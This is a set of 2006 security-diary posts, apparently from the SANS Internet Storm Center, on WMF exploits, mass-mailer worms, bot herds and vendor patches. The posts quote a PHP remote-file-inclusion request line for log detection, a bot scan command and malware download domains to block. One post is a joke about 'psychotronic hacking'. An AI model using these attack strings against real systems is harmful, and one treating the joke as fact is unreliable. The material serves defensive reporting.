  • Apple is gaining market share. History has shown more popular OSes get attacked more. Exploit developers like to say there are zillions of affected customers. Look at it the other way: Seen any recent high profile exploit against AIX, Windows 3.1, Ultrix, IRIX, ... ? I'm pretty sure they are not 100% vulnerability free, just not that interesting as a target.
  • Anti-virus, anti-spyware, ... software for OS X? There is such software, I tried to buy it.
    • I went to the website of a well know anti-virus vendor, found they had something for Tiger, but when I tried to go to their consumer ordering system, I got a nice message I needed to use Internet Explorer to order anything. Hmm, I'm happy to say I do not have Internet Explorer on my Mac, and want to keep it that way.
    • I went to their business side of the web, and unexpectedly, I could order there the OS X version of their product, and their shopping basket was working for both safari and firefox. Funny, it looks like it's the same software for that basket. But apparently corporate customers are not meeting the roadblock that prevents them from entering that part of the website even if they do not surf the web with MSIE.
    • They only sell their OS X product in bundles of 5 licenses. I don't have 5 Macs, just 2. Nor am I likely to buy 3 more macs in the near future.
So, for as far as they are concerned, I'm still without anti-virus and anti-spyware protection on my Mac, guess the rest of the network will have to live with me not helping in protecting them.

So somehow we'll need to live with the constantly increasing risk and a user community that thinks it is invulnerable.


Many security professionals will try to avoid Microsoft's Internet Explorer (MSIE). We can see this at isc.sans.org: about 50% of our hits come from MSIE, while less security minded sites get more like 80% of their hits from MSIE.
But are those alternatives safer ? Probably. Are they 100% safe? No, those browsers all have had their share of problems and they all support executing downloaded code and tracking technology (java, javascript, cookies). Add to that vulnerabilities in the code itself and you should not feel safe surfing with any of these browsers to any hacker's website.
Even the tools used to gather known malicious content such as wget and lynx have been suffering from vulnerabilities.

The rest

Please, don't try to convince me your favorite OS is immune to everything.

To take just one example: Linux: sure better security due to most of the users not using it with superuser rights. But is it immune to worms, trojans etc. ? No. And for the rest you'd better reread the Apple story above as most of it applies to Linux as well.

Not even OpenBSD has a zero defect track record.


There are other solutions than unplugging the network permanently. It's called defense in layers. You choose the least vulnerable, the least exposed, the least targeted, the least commonly used solution and you choose them in layers around you so that each layer protects you redundantly.  And if all fails you are ready to mitigate the consequences, learn form the experience and rebuild.

But living with the illusion of security is the worst solution as far as security is concerned.

Swa Frantzen


Published: 2006-01-18

New mass mailer spreading (Blackmal/Grew/Nyxem)

We got several submissions of new mass mailer worm spreading around. Besides the usual stuff that worms do these days (disable AV programs, scan the local system to find new e-mail addresses) this one is a bit more interesting as the attachment can be either an executable file or a MIME file that contains an executable file.

The sample we received had attachment named Attachments00.HQX - which is actually just an uuencoded file:

begin 664 Attachments,zip                                      .SCR

You can also see a typical "insert a lot of spaces before the real extension" trick.

Detection of the worm is decent with various AV programs and they remain inconsistent for naming as always (Symantec calls this worm W32.Blackmal.E@mm, Trend Micro calls it WORM_GREW.A, while Sophos calls it W32/Nyxem-D - go figure!).
Seems like we'll have to wait more for CME.


Published: 2006-01-18

Oracle patches

Oracle released patches on Tuesday, I highly recommend security professionals to check with their DBA and/or Oracle.

This URL might save you some time digging through the website trying to find release notes:
Still such a large chunk of patches at one go is a bit too much. Let's have them more often and a bit fewer please.

Swa Frantzen


Published: 2006-01-16

Veritas Exploit on the web

FrSIRT has notified the ISC that a new exploit has been released utilizing the Stack Overflow vulnerability in Veritas Netbackup Enterprise Server.  As a reminder, a specifically crafted packet, sent to the Volume Manager via port 13701, will cause a stack overflow, allowing the attacker to run code of her/his choosing.  Authentication by the attacker is not needed to take advantage of this vulnerability.  

The vulnerability that this exploit takes advantage of is ~60 days old.  The downside of this exploit is that, in one pass, an attacker would have the ability to create a disaster, and then destroy a company's ability to recover from said disaster.

The security packs that address this vulnerability, Symantec Advisory #SYM05-024, can be found here. 

Thanx again to FrSIRT for providing the update.


Published: 2006-01-16

Two-factor authentication Defense Mechanisms

With the growing use of two-factor authentication, users are finding it increasingly difficult to safely transport and, especially, store one of the more common devices used in this endeavor; the Smart Card.  A device the size and shape of a common credit card, this is different from standard credit cards in that it has an embedded chip for the storage of information, particularly user information and certificates.  Recent discussions brought about the point that an individual might be wise to protect the Smart Card with the same degree of protection as the other piece of two-factor authentication, the PIN.  

Both devices, at a minimum, require protection from the greatest threat posed to date, and that is electromagnetic psychotronic hacking form mind control carriers (MCCs).  In previous articles it was established that psychotronic hacking can be used to decrypt and read brain waves, so the process of hacking a Smart Card would be child's play for MCCs. 

*PIN Protection unit (PPU)

*Smart Card protection unit (SCPU)

The regular practice, and combined use, of the PPU and SCPU will result in a little known heightened state of personal security, commonly referred to as Infosystems Defcon 10T (ID-10T)


Published: 2006-01-16

WMF Generator

We received notification last night that a working exploit "MS Windows Metafile (WMF) Remote File Download Exploit Generator" has been released to the public.  The code takes advantage of the "Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution", MS# MS06-001.  The exploit code will generate a .wmf that downloads and executes a specified URL.  The sad part to this story is that we have a set of 'plug & play' source code for evil-doers to spread their wares with.  And only 10 days after a patch has been released. 

 Additionally, as noted by reader Juha-Matti Laurio, we can expect to see variants coming very soon.  The group responsible for this release is well-known for this.


Published: 2006-01-16

How do you deploy?

Last night a question was put to us, "I wonder how many people use vendor-loads (on new machines) versus reformat/reload?"  Therefore, in the interest of science (and general curiosity) I thought I would throw the question out for discussion today.  Feel free to let us know via the "Contact" link at the top of this page how you, or your organization, choose to deploy.

/-- UPDATE --/

We have received a number of responses to this question, and the majority has been of the 'reformat/reload' variety.  One of our readers, Ian, submitted some excellent thoughts I would like to share:

 "Experience has shown that vendor loaded machines are regularly unstable, sluggish and overflowing with bloat-ware and needless applications not to mention Windows features which most users will NEVER use!  EVERY instance of clean installation has resulted in a stable, fast (in comparison) machine plus space saving on the hard-drive.  Feedback is always positive... On older machines, people who had considered forking out thousands on the latest and greatest have reconsidered and saved their hard earned coins a little longer.

Dare I question Pros and Cons?  I do...  Pros: Nothing beats the familiarity and intimacy of a custom install... every file is accounted for and required, a blessing if trouble shooting is required in the future.  Cons: Time, it can be time consuming performing a reformat/clean install depending on configuration but long term those hours appreciate to savings in the event of a catastrophe - A worthwhile trade off."  (Thank you Ian, have a safe trip)

Another point submitted by a reader, who wished to remain anonymous, is that when calling a vendor for support, they often require their tools be loaded, or worse, left intact via an install from their recovery CD's.

/-- FINAL WORD --/

The final tally is an overwhelming 'reformat/reload' with some interesting thoughts on how to go about it.  I will consolidate some of those thoughts, and add them to this write-up later in the week. 

Many thanx go out to everybody who wrote in today.  Thank you.


Published: 2006-01-16

Windows Vista security patches

        Microsoft has released a security update for the in-testing Windows Vista.  The update addresses the WMF vulnerability covered earlier this month for released windows versions.
(Thanks to EWeek for the link.)
        -- Bill Stearns


Published: 2006-01-15

Handlers in Orlando

        A number of the incident handlers (Johannes Ullrich, Mike Poor,
Marc Sachs, Bill Stearns, and possibly others) will be at Sans 2006 in Orlando.
I'll be teaching the Linux System administration class; feel free to stop by after class to
say hi.  I'd love to meet you there.
        -- Bill Stearns


Published: 2006-01-14

Bot herds exploring vertical markets

Malware has become a business like any other over the last few year. Individual bot herds will grow, innovate, merge and well, sometimes even fold.

Visiting an IRC server used to control bots, the following message made perfect sense in that respect:

*** Topic for #-sd-bot: $xscan asn139 
200 5 0 217.x.x.x -r -s
*** #-sd-bot burt0n 1137203776
*** #-sd-bot 1136645024

The channel used to control the bots, '#-sd-bot', is using a standard command to instruct its members to scan an IP range for a particular vulnerability. On the other hand, if a human should connect to the host and issue a '/list' command to find out about channels on that server, the following message is displayed:

*** Channel Users Topic
*** #help 1 IF YOU ARE HERE ITS

We do not know if the owner of 'Nortonantiviruses.com' is actually associated with the bot channel. But the site is not a legit Symantec/Norton site. Instead, its "placeholder" site collecting referral fees. Its whois registration is anonymous. The referral site does not appear to be malicious.

This is just a logical evolution of the current bot business. Like any business, the operators try to maximize the revenue they receive from a customer. If a customer found out that they are infected, and is visiting the bot server to find out more, they may as well try to get a cut on the cleanup revenue which would otherwise be lost.


This was posted to the 'funsec' list a while ago:

"So he changed his topic:



....however, I guess he didn't like the exposure...after a few hours:

-:- SignOff burt0n: #help (User has been permanently banned from burt0n.IRC

-:- Connection closed from xx.43.235.xxx: Success
-:- BitchX: Servers exhausted. Restarting.
Score: ISC 1 - Burt0n 0

Cool if things work out "right" sometimes.
We also got this message via our contact form signed 'burt0n':

"my connection aint secured, im str8 to you guys theres is no buisness market using my bots, I did not even noticed nortonantiviruses.com isnt the symantec site. SORRY. BYE."

Hmmm... So maybe just a good ol' dumb script kiddie? Why did he infect the systems in the first place? The message was posted from a Sympatico IP address in Canada.


Published: 2006-01-14

Tippingpoint IPS DoS

We are getting multiple reports of a DoS attack against TippingPoint IPS devices.

More details will most likely follow as it clears up.
Swa Frantzen


Published: 2006-01-14

Apple QuickTime and iTunes continued

Apple seems to hit a rough spot in the road with their latest patches.


Accusations of the software's main new feature calling home with track and artist names of the files you play. Now of course that's needed to show related albums for you to buy, but there are a number of questions remaining open. Till then, perhaps it's better not to have the call home feature if you value privacy or just have too many mp3s ...


I have the original upgrade myself and no problem so far, but aparantly Apple has recalled it. And they also seem to have published it again. Bottom line: I'm confused. Take care with not updating QuickTime to 7.0.4. as it did patch 8 vulnerabilities. Perhaps that silly joke movie can wait a little longer than getting exploited.

Of course if you produce movies quicktime's functionality might be more important than the security of your browser on the Internet and your risks might be different.
  • For general users, I would urge not to downgrade as you'll have the vulnerabilities back. Moreover the problems seem to be not that clear. I'm running the initial Quicktime 7.0.4 uprade and it works just fine.
  • Still the uninstaller is here should you not be able to continue without the old version.
Before some of our readers think I'm bashing Apple: I'm typing this on a Mac, a Mac I like a lot.
Before some think I love Apple for all they do: I don't, but that's another story.

Swa Frantzen


Published: 2006-01-13


PHP versions 4.4.2 and 5.1.2 have been released. They do address a number of security issues, so take a look at the changelogs and start planning the upgrade.

Swa Frantzen


Published: 2006-01-13

CERTs warn about old java bug being exploited

US-CERT and AUSCERT warn about a bug in java being exploited. The bug was made public in November 2005.

Aside of the obvious patch and turn off java support, the warnings include text as "avoid clicking on any links in emails or instant messages, unless the email was already expected beforehand" and "by only accessing Java applets from known and trusted sources the chances of exploitation are reduced."

To the best of my knowledge the general user population expects email. They use email to communicate with people they never met before. And they will click on anything in it. Similarly they call it "surfing the web", they will click on links that lead to other sites. Telling them not to do that is going to have as much effect as asking them not to laugh at you. There are unfortunately only a very few exception where you might have users and applications where you can limit the exposure. But as a general recommendation it is rather worthless IMHO.

So download that latest greatest java environment now if you haven't done so already and upgrade. Better yet: check those browser settings and turn java off for all sites that you either not trust 100% to execute code on your machines or that don't absolutely need it to work.

Swa Frantzen


Published: 2006-01-13


Friday the 13th, what do you believe?

If you believe the stories you might not want to leave the house today. Or was it about unplugging the Internet connection? I'm not superstitious, so I took on today as a handler. Now perhaps that was tempting fate, we'll see at the end of the day.

So let us know if today is your lucky or your unlucky day security wise. If anything interesting pops up we'll make a summary at the end of the day.

What I am interested in is if any of the businesses associated with our readers do take any measures due to the date.


Published: 2006-01-12

Windows XP Support Extended

Microsoft provides different levels of support for their products for varying periods of time depending on how they categorize the product.  For information about Microsoft's lifecycle support policies, go here

Most of the Windows XP family of operating systems (Home, Embedded, Media Center and Tablet) are considered to be consumer products.  As such, Microsoft provides mainstream support for 5 years after the product was released and self-help online support for 8+ years.

Mainstream support includes:

  • Incident support (no-charge incident support, paid incident support, support charged on an hourly basis, support for warranty claims)
  • Security update support
  • The ability to request non-security hotfixes

Self-help online support includes:

  • access to Microsoft's Knowledge Base articles
  • access to FAQs, troubleshooting tools and other resources
  • it does NOT include security update support

Windows XP Pro is considered Business class software.  As such, Microsoft provides mainstream support for 5 years after the product was released, extended support for an additional 5 years and self-help online support for 10+ years.

Mainstream support includes:
  • Incident support (no-charge incident support, paid incident support, support charged on an hourly basis, support for warranty claims)
  • Security update support
  • The ability to request non-security hotfixes

Extended support includes:

  • Paid support
  • Security update support at no additional cost
  • Non-security related hotfix support requires a separate Extended Hotfix Support contract to be purchased. Per-fix fees also apply.
  • Microsoft will not accept requests for warranty support, design changes, or new features during the Extended support phase.
  • Extended support is not available for Consumer, Hardware, Multimedia, and Business Solutions.

Self-help online support includes:

  • access to Microsoft's Knowledge Base articles
  • access to FAQs, troubleshooting tools and other resources
  • it does NOT include security update support

Extensions - Consumer

So for the consumer versions of Windows XP, mainstream support was going to end on December 31, 2006 and there was no guarantee of any security hot-fixes beyond that time.  Microsoft has now extended the mainstream support deadline for the consumer versions to an undefined date that is two years after the release of the follow-on operating system.

Extensions - Business

For the business grade Windows XP Pro, mainstream support was also going to end on December 31, 2006.  Extended support would have kicked in at that time and been provided until December 31, 2011.  If there were any security issues requiring a hotfix, these would have been provided at no cost.  One would have hoped that such hotfixes would have also been made available for the consumer versions of Windows XP as well.  Non-security related issues would only be patched if you were willing to pay for them.

Microsoft has now extended the mainstream support deadline for the business version to an undefined date that is two years after the release of the follow-on operating system and they have extended the extended support deadline to an undefined date that is seven years after the release of the follow-on operating system (thus five years beyond the end of mainstream support).

Published: 2006-01-12

Mozilla Thunderbird 1.5 Release

For anyone who has been running one of the Thunderbird 1.5 release candidates, the official 1.5 release of Thunderbird was made available today.  You can download it here


Published: 2006-01-11

New email virus making the rounds

We are currently analyzing a copy of .. something.  Attachment name "message.zip", detection by AV is still thin to nonexistent. When run, the code tries to pull additional files from web servers in Russia, so if you have a chance, you might consider blocking the following TLDs on your proxy / perimeter:

1gb.ru  /  t35.com  /  hzs.nm.ru /  users.cjb.net /  h16.ru

UPDATE 2200UTC:  message.zip contains a file named "Secure E-mail File.hta", which is according to current Virustotal output only detected by Panda and Kaspersky, the latter calls it Worm.Win32.Feebs.k . Samples we've seen come in an email with subject "Secure Message from HotMail.com user". The HTA file is nicely obfuscated, it has 2 obfuscation functions, one being easy unescape, while the other one is a bit more complex. Once it is executed by a user, it will run in the local zone, so it can use various ActiveXObjects. It will try to download executables from 5 web sites (domains listed above), all of which are up and working at this moment.

MD5 sums for the original exploit file and the two variants of EXEs it downloads when run:
7eb24b4c7b7933b6a0157e80be74383c  Secure E-mail File.hta
9cbd9710087bff6f372b1e3f652d8f7c  feebs1.exe
983bf330aae51535c7382dc82429364b  feebs2.exe

Analysis and write-up by fellow handler Bojan Zdrnja. Thanks! :)


Most of the AV vendors are now detecting this as another variant of the Feebs family. Here are links to couple of descriptions:

Symantec (W32.Feebs.[D|E]@mm):

Trend Micro (JS_FEEBS.M):

F-Secure (Feebs):

Thanks to Juha-Matti and Danny Goodman  for sending information about this!


Published: 2006-01-11

Default Password in Cisco MARS

Cisco MARS (Cisco Security Monitoring Analysis and Response System) seems to contain an undocumented "make me root" command. If you are using CS-MARS, Cisco have just published an advisory.


Published: 2006-01-10

Quicktime patches for Mac and Windows

Is Apple hiding behind Microsoft's advisories?  Seems like Apple has been conveniently releasing security advisories on the same day as Microsoft's.  Conspiracy theory?  You be the judge.

Anyway, Apple released a security update to Quicktime.  http://docs.info.apple.com/article.html?artnum=303101  There are multiple vulnerabilities patched.  To summarize the advisory: A maliciously-crafted GIF/TIFF/TGA/QTIF image or multimedia file may result in arbitrary code execution.  Well that pretty much covers the whole web browsing thing. 

Given the week we've had, I suppose that everyone should go back to using netcat for surfing the web.


Published: 2006-01-10

Regularly scheduled MS updates

Microsoft has released two more security bulletins today.  They made no changes to the WMF bulletin from last week.  I'll be updating this throughout the day.

The first issue, MS06-002, is another client vulnerability that is triggered by browsing to a malicious web server.  You should probably treat this with the same severity as you treated the WMF issue from last week.  The eEye advisory gives some more details about the issue here: http://www.eeye.com/html/research/advisories/AD20060110.html.  It seems that malicious files may have .eot extensions and you may want to consider blocking those file types on web surfing, but the eEye advisory specifically states that the file extension could be anything.  Given the recent speed of Metasploit modules for new exploits, I would guess that a new module to create exploit files will soon be available.  Another point to note is that the data is compressed, so writing IDS/IPS signatures may be difficult.

The second issue, MS06-003, affects Outlook and Microsoft Exchange and it also looks fairly serious.  If you can't patch your Exchange servers immediately, read the "workarounds" section of the bulletin for information about blocking files that could be triggering this vulnerability.  It mentions the possibility of blocking email with an attachment name "Winmail.dat", however this will create other issues.  Read the entire "workarounds" section of the bulletin for the complete story.


Published: 2006-01-09

Another WMF attack vector?

We had hoped the chapter on WMF exploits had finally been closed, pending the patching of countless millions of vulnerable workstations of course.  However, today we were forwarded a Bugtraq disclosure of two additional functions vulnerable to memory corruption attack within the Microsoft graphics rendering engine.  The flaw reportedly affects the 'ExtCreateRegion' and 'ExtEscape' functions and while there has been no current proof of concept exploit/DoS code publicly released we will be watching this issue closely.

reference: http://www.securityfocus.com/bid/16167  (Sorry, you have to cut/paste).


Published: 2006-01-09

Probable php shell/web defacement tool usage on the rise

The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts intended to deface websites leveraging PHP remote file inclusion.  Multiple reports in a short period of time seem to indicate aggressive scanning activity leveraging this tool suite.  This particular attacker/tool combination has search engine hits going back to early December 2005, so the tool has been around for at the very least a short period of time.  The initally reported site hosting the se php scripts has already removed the offending tools, but script hosting will always remain a moving target.

If you are running PHP enabled web servers, take a peek at your recent http logs for any hits similar to the following.  Clearly the common thread will be 'ref=' and 'cmd=' on the same http log entry.  Looks fairly trivial to create a snort signature to identify this scanning/abuse considering that this is an edge case that bleedingsnort rules does not yet alert on.  We'll probably post a usable snort signature later today.

GET /?ref=http://www.[removed]/[MultipleTargetFiles].dot?&cmd=

If you find unique hits on this abuse, feel free to report them back to us and we will make notification to the script hosting provider.

If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable.

allow_url_fopen = Off


Published: 2006-01-08

Handler Candy

And now for something completely different...

Given the ongoing WMF saga for the past two weeks,  here's some Sunday Brain Candy(TM) to help you readers relax and get ready for next week:

Podcast Candy
  • Rocketboom [Warning: we've had one user report that the page handled the quicktime plug-in oddly, and ended up crashing his Firefox browser.]

Visual Candy
Aural Candy

This is a quick ambient piece of mine that I hope you will sit back and enjoy.  On behalf of the Handlers, thanks for all the help and support during the WMF analysis.  (Released using the Creative Commons License, so no copyright issues here!)
Have a pleasant Sunday evening, everyone!

Dave Brookshire


Published: 2006-01-08

Apple AirPort Firmware Update

On Thursday, Apple released an update to their AirPort firmware that
fixes a vulnerability (CVE-ID: CVE-2005-3714) that would allow an
attacker to craft packets causing an AirPort Base Station to
stop responding--therefore, denial of service.

Update is available from the "Software Update" pane in the System
Preferences, or from Apple's Software Download site:


Information will also be posted to the Apple Product Security web site:



Published: 2006-01-08

Blue Coat WinProxy Vuln

Blue Coat Systems WinProxy Vulnerability, Patch and remote exploit announced.  Exploit code has been published and according to the iDefense Advisory "Exploitation .... is trivial" and "allows for the remote execution of arbitrary code by attackers."


"iDefense has confirmed this vulnerability in WinProxy 6.0. All previous
versions are suspected to be vulnerable.".

Patch - WinProxy 6.1a

Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-4085


Published: 2006-01-08

2006, Week 1: A Look at the Numbers

The first week of the new year has been a pretty busy one for the Handlers, mostly surrounding the WMF issue.  At last count, 1740 e-mail messages have gone through the Handlers list, for an average of 247 messages per day.  Of those, the term "WMF" appeared in a subject line 989 times.  Of the total, there were 834 unique 'From' addresses.  I remember, when I first joined the Handlers, a busy day was in the neighborhood of 40 messages.  Whew.

Here's hoping the rest of 2006 smooths out a bit.

Dave Brookshire


Published: 2006-01-07

WMF: Status of Windows 98 and Windows ME ?

We continue to receive questions from Windows 98 and Windows ME users concerning WMF.  To simplify reading (and writing) this diary, I will refer to these two versions of Windows as win9x.

Is there risk?

Win9x has the flawed gdi32.dll library. In the initial advisory, which is no longer online, Microsoft listed that win9x in the company of all of the other vulnerable operating systems.

However, win9x is slightly different from the more recent Windows versions in the way it works. These differences are enough to prevent the current and publicly known exploits from working.  It does seem that Microsoft is confident that these differences are substantial enough to keep win9x tailored WMF exploits from becoming available.

So to answer the question above, yes there is a risk. Win9x is most likely vulnerable but there is no clear and present threat (yet!).

Patch please?

We have been asked for a win9x patch or other foolproof solution for these systems. Unfortunately:
  • Microsoft has not released an official patch so far and there is none on the horizon either.
  • The Microsoft workaround (unregistering shimgvm.dll to prevent access to the vulnerable code in gdi32.dll) for other windows versions cannot be performed in win9x.  The shimgvm.dll library file does not exist in win9x.
  • The unofficial patch which we endorsed in a very specific situation does not work on win9x. These older versions lack technology needed for the patch to protect in memory libraries from being accessed.
  • We know that several software coders have or are going to publish patches for Win9x systems.  However, we highly recommend that you make a risk decision based on your own situation as to whether you wait for a Microsoft patch.  We did the extra-ordinary thing of recommending an unofficial patch earlier for a very specific condition. The conditions for the win9x
    situation are simply not the same now. There is no clear and present threat and the defenses in the form of anti-virus programs have become significantly stronger.

What options that are left?

If you find a no-user-interaction-required exploit of WFM files against win9x, send it to Microsoft (or alternatively send it to us, we will disclose it responsibly to Microsoft).  This would be the last necessary requirement for Microsoft to build and release an official patch for win9x.

It may take a while for this "critical" exploit to surface and some of you want a solution now.  You are left with:
  • Accept the risk and play the wait and see game.
    • Possibly, try to mitigate the risk by getting a good anti-virus program in place, preferably one that is known to trigger on the exploits without triggering on the payload in the WMF. Make sure the signatures are always up to date.
    • Possibly, try to mitigate the risk by isolating the system. Isolating can be done on networks by air-gapping the machines, by removing floppy and cd-rom drives, by disabling USB ports, etc... Some systems might benefit enough from this to remain usable for a while longer.
  • Balance the risks of one of the unofficial patches.
    • I cannot recommend this action at this time, but it is an option you can evaluate, if you find it reduces your overall risk you might have a mitigation strategy.
  • Mitigate the risk by changing the OS
    • You might need to upgrade the hardware in order to be able to upgrade to a more recent version of windows. (Remember: if you pass down the old hardware to your family, friends or a good cause, they now have the problem you had)
    • The hardware capable of running win9x is mostly capable of running alternative operating systems such as Linux, OpenBSD, FreeBSD, and others.  So you have many choices from witch to pick.
You could try to find a combination of the above that fits your specific situation or company policies.

We'd like to give you better alternatives, but currently we see none.

Swa Frantzen


Published: 2006-01-06

It is all about the risk.

In recent discussions with regards to the WMF vulnerability in Microsoft products there have been may different viewpoints. For example, about whether or not to apply the unofficial patch or wait for one from the vendor. Now it is a somewhat moot point, Microsoft has released their official patch, and it works. Email feedback on our diary posts from the time of the discovery to the time of the MS advisory have been very strongly either for or against some of the stances taken by individual handlers and the Internet Storm Center as a whole. They vary from a hearty thank you, to somewhat less than flattering.

In any case, what it comes down to is the risk to the individual or organization, and how that is managed. A home user may have no compunctions about going ahead and installing the unofficial patch. Or they may choose to wait for the officially sanctioned one, the ease of install and their level of computer knowledge will likely guide them. Corporate or Governmental organizations would have a completely different perspective. Installing a patch can be a major undertaking no matter the source, and their risk management practices would dictate how to proceed. Different organizations will have completely different approaches to determining their risk, and the appropriate actions to mitigate it. Acquiring, testing, and deploying either the official or unofficial patch (or other forms of mitigation) is a significant undertaking no matter the steps taken to arrive at the decision to do so. They may even choose to simply accept the risk and do nothing at all.

The Internet Storm Center is made up of a group of volunteers that have different backgrounds and perspectives on the overall risk of the WMF vulnerability, and the active exploitation seen. The group consensus was that the risk was high enough to warrant raising the Infocon level, and then testing and endorsing the unofficial patch. We are well aware that one size doesn't fit all. At the time it was the only mitigation technique that actually worked. Anti-virus, IDS/IPS do not give adequate protection against this attack and all of its vectors.

We collectively think Microsoft did the right thing in releasing the patch when they did, in advance of their regularly scheduled Tuesday. I think we can all agree that this is a serious issue, and that early patch release is a good thing.  

Many handlers worked long hours on this effort, as did Microsoft and others.

Adrien de Beaupré
ISC handler of the day.
Cinnabar Networks Inc.


Published: 2006-01-05

A sober New Years update.

Sober.Y will be attempting to update itself tonight at midnight. If you have the ability you may wish to monitor traffic towards the sites listed below. The ISPs and hosting sites have known about this update for a while and I believe the malware has been removed from these sites so I don't recommend blocking those sites. Monitering them might provide you with a list of infected  computers:)

From http://www.f-secure.com/v-descs/sober_y.shtml

Sober.Y monitors a fixed list of NTP servers to syncronize its time. If the date is 6.1.2006 or later, instead of mass mailing, it tries to download and execute file from one of the following domains:



Published: 2006-01-05

Infocon back to green

Microsoft released an official patch early. I would like to thank all handlers who spent countless hours over the last few days (and the holiday weekend) analyzing the situation. We hope that the information we provided made the net a slightly safer place for you. Thanks to Microsoft for taking our input and we hope it contributed to the decision to publish this most important patch early.

For more details about installing the patch, and uninstalling the unofficial patch, see our
prior diary.

johannes ullrich, jullrich@/sans.org
CTO Internet Storm Center.


Published: 2006-01-05

Technical document on WMF vulnerability and Guilfanov's patch available

I've written a technical document describing what is going on "behind-the-scenes" to cause the current WMF SETABORTPROC vulnerability and how Ilfak Guilfanov's patch worked to mitigate it.  Included are both annotations to the patch's source code and an annotated disassembly of the patch itself. 

Interestingly, reading Microsoft's description of their patch:

Specifically, the change introduced to address this vulnerability removes the support for the SETABORTPROC record type from the META_ESCAPE record in a WMF image. This update does not remove support for ABORTPROC functions registered by application SetAbortProc() API calls.

it appears that they ended up doing the same thing that Guilfanov's patch did (but where Guilfanov' had to jump though .dll injection hoops, they could just change the source code and recompile GDI32.DLL...).

The document can be found here.


Published: 2006-01-05

* Microsoft Patches Coming Today

Many of you already know this if you receive advance notification from Microsoft.  For everybody else, see their announcement about an early release of the WMF patch.  The patch and details about it are available here.  We'll provide more analysis once the patch is out and we've tested it. 


Published: 2006-01-05

WMF mitigation may cause printer problems.

We have received reports and researched an issue with Ilfak's patch AND/OR deregistering SHIMGWV.DLL causing printing issues.

De-registering SHIMGVW.DLL can cause printer issues. This has been verified.

Pedro a fellow SANS handler provided this:
"From Microsoft Windows Server 2003 Inside Out
By William R. Stanek The client first uses the print driver to partially render the document into EMF and then spools the EMF file to the print server. The print server converts the EMF file to final form and then queues the file to the printer queue (printer)."

ScottF another SANS handler states "I have seen a few new printing bugs...basically the printer spooler tray icon pops up and says there is an error and then prints without a problem" this was when SHIMGWV.DLL was deregistered.

It appears that Ilfak Guilfanov's patch can also cause printer problems.

Paul Shane reported
"It seems that users printing with Lotus
1-2-3 V5  for windows (yes...the old version), running on Windows XP, cannot print with the hexblog patch installed.  As soon as the patch is uninstalled and the machine is rebooted, printing works."

 Finally JimC another SANS handler writing about Ilfak's patch states:
"Actually, I guess this one doesn't surprise me too much.  The "legitimate" use of the SETABORTFUNC Escape() call in gdi32.dll is for printing. We have heard of a couple of other widely scattered situations where some sort of printing function was disrupted by the unofficial patch.


Published: 2006-01-04

What do the bad guys do with WMF?

With all this confusion about WMF files and various official and unofficial patches, you are probably wondering what the bad guys are doing with this.

We tracked quite a bit of exploits going around. Lately exploits started using Metasploit and we even received a standalone utility (so called WMFMaker, already described by Panda Software) that anyone can use:

$ ./wmfmaker

        Have fun

---- visit <REMOVED> -----
wmfmaker <file with payload>

No wonder that the bad guys started exploiting this more and more.

The main vector that the bad guys use to exploit this is still by posting it on web sites. The golden target would be a banner site or something that is visited frequently, but luckily, so far we didn't see anything widespread as that.

This doesn't mean that there are no exploits. One spam which was published by F-Secure (http://www.f-secure.com/weblog/archives/archive-012006.html#00000768) tried to get the user follow the link about "Vandalism Over the New Year". The site in question is now gone, so this is not a problem anymore, but the typical scenario was: WMF file which drops a downloader, which then subsequently downloads other trojans.
Besides this one, we also received various "Greeting Card" spams. Although the e-mail claimed that the greeting card is on 123greetings.com, the link actually pointed to http://mujeg orda.bita coras.com/REMOVED - this site is still active.

So what do all of these exploits actually drop? The answer is: typical "bad guys" stuff. They are usually dropping various versions of SDBot and similar IRC trojans. This will enable them to herd zombie machines that they use in the future.
One other exploit that we saw (thanks to Juha-Matti) dropped a pretty nasty password stealer/trojan, Trojan.Satiloler.B.

Finally, there was an interesting post by Andreas Marx on Bugtraq. Among various malware that the WMF files drop, they found one with a built-in counter on a "hidden" website. The counter seems to be going up fast - last year it was around 200.000 while today it is over a million. We can't be sure that the counter is correct, but we can be sure that the bad guys are on track with this vulnerability.

We are yet to see if other vectors will be exploited, but I'm afraid that this is more than enough for the bad guys to build a nice "army" of zombie machines.
So practice safe hex and patch/protect your machines as much as you can.


Published: 2006-01-04

Oldest infected .wmf?

We have a little project for all of the forensic treasure hunters out there.  As you all know, the .wmf issue came into public view about a week ago.  Since then, we've found that there are infected .wmf files with dates going back several weeks, so this little beauty has been around for a while.  What we are looking for are any confirmed intrusions earlier than the first of December 2005 that can be traced to this current vulnerability.  By confirmed, we mean that not only is the date of an infected .wmf file on a compromised system earlier than December 1st, but you can also prove that it was installed prior to December 1st and had some type of malicious payload embedded in it.  Tell us whatever you can share, and we'll summarize the details for others.  There's no prize for the earliest detect, but we are pretty sure that many would be interested in knowing how long this vulnerability has been actively exploited.


Published: 2006-01-04

Preparing for Battle

Are you ready to battle a large virus/worm outbreak?  Please don't view
this is a prediction that there will be a large event, but let me just
say that conditions are right for a big storm (WMF issue and the return
of the Sober worm).

Regarding the WMF issue, you have probably decided to either wait for
the official Microsoft patch, or you are rolling out Ilfak's patch.  But
there is still about 6-10 days of risk here for a major worldwide event.
So here are some recommendations for preparing for the battle.  (This is
primarily written for system and network admins...)

Prepare a short briefing for management on the situation:
1) There is a serious vulnerability in Microsoft operating systems.
2) An official patch will not be available from Microsoft until Jan. 10.
3) There are multiple propogation vectors: e-mail, instant messaging, web
surfing, etc.
4) Several different versions of the exploit are in the wild and are
being actively used by criminal groups.  All propogation methods are
being used.  As of Wednesday, Jan 4 20:15:00 UTC, our current poll
indicates that 22% of respondents (340) have seen exploit attempts
through one of the exploitation vectors.
5) Tools to generate random files to exploit the vulnerability are
publicly available.  These tools may be used to evade anti-virus and
IDS/IPS signatures.
6) Anti-virus signatures and intrusion detection/prevention system
signatures may only be able to catch the first generation of exploits.
7) If an outbreak does occur, how are you going to sanitize laptops that
were infected outside of your network before allowing them to connect
to your internal network?

As you provide this information, you should also provide an action plan
for mitigating damage in the worst case scenario.  You should consider
the following action items in your plan.  Also consider that your
organization may have no internal infections, but that the rest of the
Internet is having problems.  Solicit input from your management on the
circumstances that would dictate each of the actions below.

1) Disconnect from the Internet.
2) Disconnect specific services from the Internet.  Talk with your
network/firewall admins and have them be prepared to shut-off specific
